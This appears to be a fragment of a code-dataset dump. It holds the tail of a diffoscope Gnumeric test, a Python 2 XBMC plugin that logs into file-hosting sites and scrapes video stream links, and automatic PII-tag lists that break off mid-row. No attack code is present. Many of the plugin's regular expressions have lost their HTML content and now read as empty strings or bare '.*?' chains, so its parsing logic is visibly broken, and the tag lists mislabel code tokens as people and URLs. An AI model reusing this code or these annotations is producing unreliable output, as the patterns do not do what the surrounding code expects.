version. +# +# diffoscope is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with diffoscope. If not, see . + +import pytest + +from diffoscope.comparators.gnumeric import GnumericFile + +from ..utils.data import load_fixture, get_data +from ..utils.tools import skip_unless_tools_exist +from ..utils.nonexisting import assert_non_existing + +gnumeric1 = load_fixture('test1.gnumeric') +gnumeric2 = load_fixture('test2.gnumeric') + + +def test_identification(gnumeric1): + assert isinstance(gnumeric1, GnumericFile) + + +def test_no_differences(gnumeric1): + difference = gnumeric1.compare(gnumeric1) + assert difference is None + + +@pytest.fixture +def differences(gnumeric1, gnumeric2): + return gnumeric1.compare(gnumeric2).details + + +@skip_unless_tools_exist('ssconvert') +def test_diff(differences): + expected_diff = get_data('gnumeric_expected_diff') + assert differences[0].unified_diff == expected_diff + + +@skip_unless_tools_exist('ssconvert') +def test_compare_non_existing(monkeypatch, gnumeric1): + assert_non_existing(monkeypatch, gnumeric1, has_null_source=False) +",1735,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Chris Lamb'], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['PERSON', ""@skip_unless_tools_exist('ssconvert""], ['URL', 'https://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'diffoscope.comparators.gn'], ['URL', '..utils.to'], ['URL', '..utils.no'], ['URL', 'test1.gn'], ['URL', 'test2.gn'], ['URL', 'gnumeric1.com'], ['URL', 'pytest.fi'], ['URL', 'gnumeric1.com']]" +107,"''' + xfilesharing XBMC Plugin + Copyright (C) 2013-2014 ddurdle + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + +''' + +import cloudservice +import os +import re +import urllib, urllib2 +import cookielib + + +import xbmc, xbmcaddon, xbmcgui, xbmcplugin + +# global variables +PLUGIN_NAME = 'plugin.video.cloudstream' +PLUGIN_URL = 'plugin://'+PLUGIN_NAME+'/' +ADDON = xbmcaddon.Addon(id=PLUGIN_NAME) + +# helper methods +def log(msg, err=False): + if err: + xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGERROR) + else: + xbmc.log(ADDON.getAddonInfo('name') + ': ' + msg, xbmc.LOGDEBUG) + + +# +# +# +class xfilesharing(cloudservice.cloudservice): + + + # magic numbers + MEDIA_TYPE_VIDEO = 1 + MEDIA_TYPE_FOLDER = 0 + + ## + # initialize (setting 1) username, 2) password, 3) authorization token, 4) user agent string + ## + def __init__(self, name, domain, user, password, auth, user_agent): + return super(xfilesharing,self).__init__(name, domain, user, password, auth, user_agent) + #return cloudservice.__init__(self,domain, user, password, auth, user_agent) + + + + ## + # perform login + ## + def login(self): + + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + # default User-Agent ('Python-urllib/2.6') will *not* work + opener.addheaders = [('User-Agent', self.user_agent)] + + if self.domain == 'uptostream.com': + self.domain = 'uptobox.com' + + if 'http://' in self.domain: + url = self.domain + else: + url = 'http://' + self.domain + '/' + + + + values = { + 'op' : 'login', + 'login' : self.user, + 'redirect' : url, + 'password' : self.password + } + + + + # try login + try: + response = opener.open(url,urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403: + #login denied + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017)) + log(str(e), True) + return + response_data = response.read() + response.close() + + loginResult = False + #validate successful login + for r in re.finditer('my_account', + response_data, re.DOTALL): + loginResult = True + #validate successful login + for r in re.finditer('logout', + response_data, re.DOTALL): + loginResult = True + + if (loginResult == False): + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017)) + log('login failed', True) + return + + for cookie in self.cookiejar: + for r in re.finditer(' ([^\=]+)\=([^\s]+)\s', + str(cookie), re.DOTALL): + cookieType,cookieValue = r.groups() + if cookieType == 'xfss': + self.auth = cookieValue + if cookieType == 'xfsts': + self.auth = cookieValue + + return + + + + ## + # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie + # returns: list containing the header + ## + def getHeadersList(self,referer=''): + if ((self.auth != '' or self.auth != 0) and referer == ''): + return { 'User-Agent' : self.user_agent, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' } + elif (self.auth != '' or self.auth != 0): + return { 'User-Agent' : self.user_agent, 'Referer': referer, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' } + else: + return { 'User-Agent' : self.user_agent } + + ## + # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie + # returns: URL-encoded header string + ## + def getHeadersEncoded(self, referer=''): + return urllib.urlencode(self.getHeadersList(referer)) + + ## + # retrieve a list of videos, using playback type stream + # parameters: prompt for video quality (optional), cache type (optional) + # returns: list of videos + ## + def getVideosList(self, folderID=0, cacheType=0): + + if 'http://' in self.domain: + url = self.domain + else: + url = 'http://' + self.domain + + if 'streamcloud.eu' in self.domain: + + url = url + '/' + + # retrieve all documents + if folderID == 0: + url = url+'?op=my_files' + else: + url = url+'?op=my_files&fld_id='+folderID + + + videos = {} + if True: + req = urllib2.Request(url, None, self.getHeadersList()) + + # if action fails, validate login + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + log(str(e), True) + return + else: + log(str(e), True) + return + + response_data = response.read() + response.close() + + for r in re.finditer('placeholder\=\""(Username)\"" id\=i\""(nputLoginEmail)\"" name\=\""login\""' , + response_data, re.DOTALL): + loginUsername,loginUsernameName = r.groups() + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + log(str(e), True) + return + + response_data = response.read() + response.close() + + + # parsing page for videos + # video-entry + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + fileID,url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + # video-entry - bestream + for r in re.finditer('[^\<]+([^\<]+)' , + response_data, re.DOTALL): + url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + # video-entry - uptobox + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + url,fileName = r.groups() + + + # streaming + videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO} + + if 'realvid.net' in self.domain: + for r in re.finditer('([^\<]+)\s+' , + response_data, re.DOTALL): + url,fileName = r.groups() + + #flatten folders (no clean way of handling subfolders, so just make the root list all folders & subfolders + #therefore, skip listing folders if we're not in root +# if folderID == 0: + # folder-entry + # for r in re.finditer('([^\<]+)' , +# folderID = 0 +# for r in re.finditer('' , +# response_data, re.DOTALL): +# folderID,folderName = r.groups() + + #remove   from folderName +# folderName = re.sub('\ \;', '', folderName) + + # folder +# if int(folderID) != 0: +# videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER} +# if folderID == 0: + for r in re.finditer('([^\<]+)' , + response_data, re.DOTALL): + folderID,folderName = r.groups() + + # folder + if int(folderID) != 0 and folderName != ' . . ': + videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER} + + return videos + + + ## + # retrieve a video link + # parameters: title of video, whether to prompt for quality/format (optional), cache type (optional) + # returns: list of URLs for the video or single URL of video (if not prompting for quality) + ## + def getPublicLink(self,url,cacheType=0): + + fname = '' + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + opener.addheaders = [ ('User-Agent' , self.user_agent)] + req = urllib2.Request(url) + try: + response = opener.open(req) + except urllib2.URLError, e: + pass + response.close() + url = response.url + +# opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar), MyHTTPErrorProcessor) + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';')] + + req = urllib2.Request(url) + + + # if action fails, validate login + try: + response = opener.open(req) + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = opener.open(req) + except urllib2.URLError, e: + log(str(e), True) + return ('','') + else: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + for r in re.finditer('\([^\<]+)\<', + response_data, re.DOTALL | re.I): + title = r.group(1) + if fname == '': + fname = title + + url = response.url + req = urllib2.Request(url) + + for r in re.finditer('name\=\""(code)\"" class\=\""(captcha_code)' , + response_data, re.DOTALL): + loginUsername,loginUsernameName = r.groups() + self.login() + + req = urllib2.Request(url, None, self.getHeadersList()) + try: + response = urllib2.urlopen(req) + except urllib2.URLError, e: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + + if self.domain == 'vidzi.tv': + for r in re.finditer('(file)\: \""([^\""]+)\.mp4\""' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + return (streamURL + '.mp4', fname) + + confirmID = 0 + values = {} + # fetch video title, download URL and docid for stream link + for r in re.finditer('.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,usr_login,id,fname,referer = r.groups() + values = { + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'method_free' : 'Free Download' + + } + + + for r in re.finditer('.*?.*?.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,usr_login,id,fname,referer,hash,submit = r.groups() + values = { + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'hash' : hash, + 'imhuman' : submit + + } + + for r in re.finditer('.*?.*?.*?.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,usr_login,id,fname,referer,hash,inhu,submit = r.groups() + values = { + + '_vhash' : 'i1102394cE', + 'gfk' : 'i22abd2449', + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'hash' : hash, + 'inhu' : inhu, + 'imhuman' : submit + + } + + for r in re.finditer('.*?.*?.*?' ,response_data, re.DOTALL): + op,id,referer,submit = r.groups() + values = { + 'op' : op, + 'id' : id, + 'referer' : referer, + 'method_free' : submit, + 'download_direct' : 1 + + } + + for r in re.finditer('.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,id,rand,referer,submit = r.groups() + values = { + 'op' : op, + 'id' : id, + 'rand' : rand, + 'referer' : referer, + 'method_free' : submit, + 'download_direct' : 1 + + } + for r in re.finditer('.*?.*? .*?.*?.*?' ,response_data, re.DOTALL): + ipcount,op,usr_login,id,fname,referer = r.groups() + values = { + 'ipcount_val' : ipcount, + 'op' : op, + 'usr_login' : usr_login, + 'id' : id, + 'fname' : fname, + 'referer' : referer, + 'method_free' : 'Slow access' + } + + values = {} + variable = 'op' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'usr_login' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'id' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'fname' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'referer' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + + variable = 'hash' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'inhu' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'method_free' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'method_premium' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'rand' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'down_direct' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'file_size_real' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'imhuman' + for r in re.finditer('' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = 'gfk' + for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + + variable = '_vhash' + for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + values[variable] = value + +# values['referer'] = '' + + for r in re.finditer('.*?.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,id,rand,referer,plugins,submit = r.groups() + + values = { + 'op' : op, + 'id' : id, + 'rand' : rand, + 'referer' : referer, + 'plugins_are_not_allowed' : plugins, + 'method_free' : submit, + 'download_direct' : 1 + + } + + + + +# req = urllib2.Request(url, urllib.urlencode(values), self.getHeadersList(url)) + req = urllib2.Request(url) + + if self.domain == 'thefile.me': + values['method_free'] = 'Free Download' + elif self.domain == 'sharesix.com': + values['method_free'] = 'Free' + + elif 'streamcloud.eu' in self.domain: + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(10)) + xbmc.sleep((int(10)+1)*1000) + + elif self.domain == 'vidhog.com': + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(15)) + xbmc.sleep((int(15)+1)*1000) + + elif self.domain == 'vidto.me': + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(6)) + xbmc.sleep((int(6)+1)*1000) + + elif self.domain == 'vodlocker.com': + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(3)) + xbmc.sleep((int(3)+1)*1000) + + + + elif self.domain == 'hcbit.com': + + try: +# response = urllib2.urlopen(req) + response = opener.open(req, urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + try: + response = opener.open(req, urllib.urlencode(values)) + except urllib2.URLError, e: + log(str(e), True) + return ('', '') + else: + log(str(e), True) + return ('', '') + try: + if response.info().getheader('Location') != '': + return (response.info().getheader('Location') + '|' + self.getHeadersEncoded(url), fname) + except: + for r in re.finditer('\'(file)\'\,\'([^\']+)\'' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + return (streamURL + '|' + self.getHeadersEncoded(url), fname) + for r in re.finditer('\([^\<]+)\<\/td\>' ,response_data, re.DOTALL): + deliminator,fileName = r.groups() + for r in re.finditer('(\|)([^\|]{42})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName + return (streamURL + '|' + self.getHeadersEncoded(url), fname) + + if self.domain == 'bestreams.net': + + file_id = '' + aff = '' + variable = 'file_id' + for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + file_id = value + + variable = 'aff' + for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL): + hidden,value = r.groups() + aff = value + + xbmc.sleep((int(2)+1)*1000) + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar)) + opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=1; file_id='+file_id+'; aff='+aff+';')] + + elif self.domain == 'thevideo.me': + + for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + return (streamURL,fname) + + elif self.domain == 'vidzi.tv': + + for r in re.finditer('\s+file:\s+\""([^\""]+)\""', + response_data, re.DOTALL): + streamURL = r.group(1) + return (streamURL,fname) + + # if action fails, validate login + try: +# response = urllib2.urlopen(req) + response = opener.open(req, urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + try: + response = opener.open(req, urllib.urlencode(values)) + except urllib2.URLError, e: + log(str(e), True) + return ('','') + else: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + op='' + for r in re.finditer('.*?.*?.*?.*?' ,response_data, re.DOTALL): + op,id,rand,referer,submit = r.groups() + values = { + 'op' : op, + 'id' : id, + 'rand' : rand, + 'referer' : referer, + 'method_free' : submit, + 'download_direct' : 1 + + } + + streamURL='' + + title = '' + for r in re.finditer('\<(title)\>([^\>]*)\<\/title\>' ,response_data, re.DOTALL): + titleID,title = r.groups() + + + # for thefile + if self.domain == 'thefile.me': + + downloadAddress = '' + for r in re.finditer('\<(img) src\=\""http\:\/\/([^\/]+)\/[^\""]+\"" style' ,response_data, re.DOTALL): + downloadTag,downloadAddress = r.groups() + + for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://'+str(downloadAddress)+'/d/'+fileID+'/video.mp4' + + elif self.domain == 'sharerepo.com': + for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + for r in re.finditer('(\|)([^\|]{60})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://37.48.80.43/d/'+fileID+'/video.mp4?start=0' + + elif self.domain == 'filenuke.com': + for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL): + deliminator,fileID = r.groups() + streamURL = 'http://37.252.3.244/d/'+fileID+'/video.flv?start=0' + elif self.domain == 'sharerepo.com': + for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + elif self.domain == 'letwatch.us': + + for r in re.finditer('\[IMG\]http://([^\/]+)\/', + response_data, re.DOTALL): + IP = r.group(1) + + for r in re.finditer('\|([^\|]{60})\|', + response_data, re.DOTALL): + fileID = r.group(1) + streamURL = 'http://'+IP+'/'+fileID+'/v.flv' + + elif self.domain == 'thevideo.me': + + for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'vidto.me': + + for r in re.finditer('var file_link = \'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'allmyvideos.net': + + for r in re.finditer('\""file\"" : \""([^\""]+)\""', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'realvid.net': + + for r in re.finditer('file:\s?\'([^\']+)\'', + response_data, re.DOTALL): + streamURL = r.group(1) + + elif self.domain == 'uptobox.com' or self.domain == 'uptostream.com': + + for r in re.finditer('\\s+\', + response_data, re.DOTALL): + streamURL = r.group(1) + return (streamURL, fname) + + for r in re.finditer('\(\d+) seconds' ,response_data, re.DOTALL): + id,timeout = r.groups() + + for r in re.finditer('

    (.*?)' ,response_data, re.DOTALL): + id,error = r.groups() + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), error) + return ('','') + + + + + req = urllib2.Request(url) + + if timeout > 0: + xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(timeout)) + + xbmc.sleep((int(timeout)+1)*1000) + + # if action fails, validate login + try: + response = opener.open(req, urllib.urlencode(values)) + + except urllib2.URLError, e: + if e.code == 403 or e.code == 401: + self.login() + + try: + response = opener.open(req, urllib.urlencode(values)) + except urllib2.URLError, e: + log(str(e), True) + return ('','') + else: + log(str(e), True) + return ('','') + + response_data = response.read() + response.close() + + for r in re.finditer('(Click here to start your download)' ,response_data, re.DOTALL): + streamURL,downloadlink = r.groups() + + #vodlocker.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('(file)\: \""([^\""]+)""\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + if 'mp4' in streamURL: + break + + # mightyupload.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('var (file_link) = \'([^\']+)\'' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + # vidhog.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('(product_download_url)=([^\']+)\'' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + # vidspot.net + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('""(file)"" : ""([^\""]+)""\,' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + + # uploadc.com + if streamURL == '': + # fetch video title, download URL and docid for stream link + for r in re.finditer('\'(file)\',\'([^\']+)\'\)\;' ,response_data, re.DOTALL): + streamType,streamURL = r.groups() + streamURL = streamURL + '|' + self.getHeadersEncoded(url) + +# return 'http://93.120.27.PI:KEY.mp4' + + + return (streamURL, fname) + +class MyHTTPErrorProcessor(urllib2.HTTPErrorProcessor): + + def http_response(self, request, response): + code, msg, hdrs = response.code, response.msg, response.info() + + # only add this line to stop 302 redirection. + if code == 302: return response + + if not (200 <= code < 300): + response = self.parent.error( + 'http', request, response, code, msg, hdrs) + return response + + https_response = http_response + + +",33648,"[['URL', ""http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName""], ['DATE_TIME', '2013-2014'], ['LOCATION', 'xbmcaddon'], ['LOCATION', 'xbmcgui'], ['URL', 'xbmcaddon.Ad'], ['PERSON', 'LOGERROR'], ['PERSON', 'LOGDEBUG'], ['PERSON', 'MEDIA_TYPE_VIDEO'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'self.do'], ['URL', 'self.do'], ['PERSON', 'self.user'], ['URL', 'self.pa'], ['URL', 'e.co'], ['PERSON', 're.finditer'], ['PERSON', 'FireDrive'], ['PERSON', 'Referer'], ['PERSON', 'FireDrive'], ['LOCATION', 'getHeadersEncoded(self'], ['URL', 'self.ge'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'streamcloud.eu'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'realvid.net'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'urllib2.Re'], ['URL', 'response.cl'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'self.us'], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 're.fi'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', 'fname'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'inhu'], ['PERSON', 'imhuman'], ['URL', 'urllib2.Re'], ['LOCATION', 'self.getHeadersList(url'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 'e.co'], ['URL', 'self.ge'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', ""re.finditer('(\\|)([^\\|]{42})\\|""], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 'self.do'], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'e.co'], ['DATE_TIME', ""re.finditer('\\<(title)\\>([^\\>]*)\\<\\/title\\""], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 're.fi'], ['PERSON', 'strong>(\\d+) seconds\''], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'r.gr'], ['URL', 'vodlocker.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'mightyupload.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidhog.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidspot.net'], ['URL', 're.fi'], ['LOCATION', '^\\""]+)""\\'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'uploadc.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['URL', 'KEY.mp'], ['URL', 'urllib2.HT'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', '37.48.80.43'], ['IP_ADDRESS', '37.252.3.244'], ['URL', 'plugin.video.cl'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'cloudservice.cl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 'self.do'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'self.us'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'self.co'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'self.do'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.su'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 'self.do'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], 